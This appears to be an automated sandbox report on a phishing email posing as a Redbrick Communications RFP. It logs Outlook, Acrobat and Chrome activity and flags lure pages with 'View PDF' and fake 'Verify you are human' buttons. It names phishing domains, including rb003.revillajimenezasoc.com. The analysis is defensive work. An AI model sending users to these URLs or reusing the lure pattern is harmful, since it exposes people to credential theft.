Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.131:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow created: window name: CLIPBRDWNDCLASS
Source: classification engineClassification label: mal68.phis.winEML@49/92@27/224
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241021T1323590703-6668.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\[EXTERNAL] Redbrick Communications Request For Proposal .eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "C893188F-B547-495B-A163-D0C4FA4A6C44" "C6D3235E-0B00-4E43-8169-199264D12382" "6668" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\FE4HG9BK\Redbrick Communications (RFP) ID#19994.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1748 --field-trial-handle=1604,i,12233105341430411722,14371217641438827000,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rb003.revillajimenezasoc.com//@
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rb003.revillajimenezasoc.com//@
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,15778528327472951222,3276190338158914891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1932,i,13640797076422111405,4577157427694876214,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 656097F4474E5D3D60577B82C0867787
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "C893188F-B547-495B-A163-D0C4FA4A6C44" "C6D3235E-0B00-4E43-8169-199264D12382" "6668" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\FE4HG9BK\Redbrick Communications (RFP) ID#19994.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1748 --field-trial-handle=1604,i,12233105341430411722,14371217641438827000,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rb003.revillajimenezasoc.com//@
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://rb003.revillajimenezasoc.com//@
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,15778528327472951222,3276190338158914891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1932,i,13640797076422111405,4577157427694876214,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Persistence and Installation Behavior

barindex
Source: PDF documentLLM: Page contains button: 'View PDF' Source: 'PDF document'
Source: PDF documentLLM: PDF document contains prominent button: 'view pdf'
Source: https://p4enterprises.com/yyhu.htmlLLM: Page contains button: 'VIEW PDF' Source: '1.0.pages.csv'
Source: https://bespoke.global-constructions.ca/LLM: Page contains button: 'Verify you are human' Source: '2.7.pages.csv'
Source: EmailJoeBoxAI: Detected potential phishing email: The email claims to have an attached RFP, but no attachment is mentioned in the JSON data
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
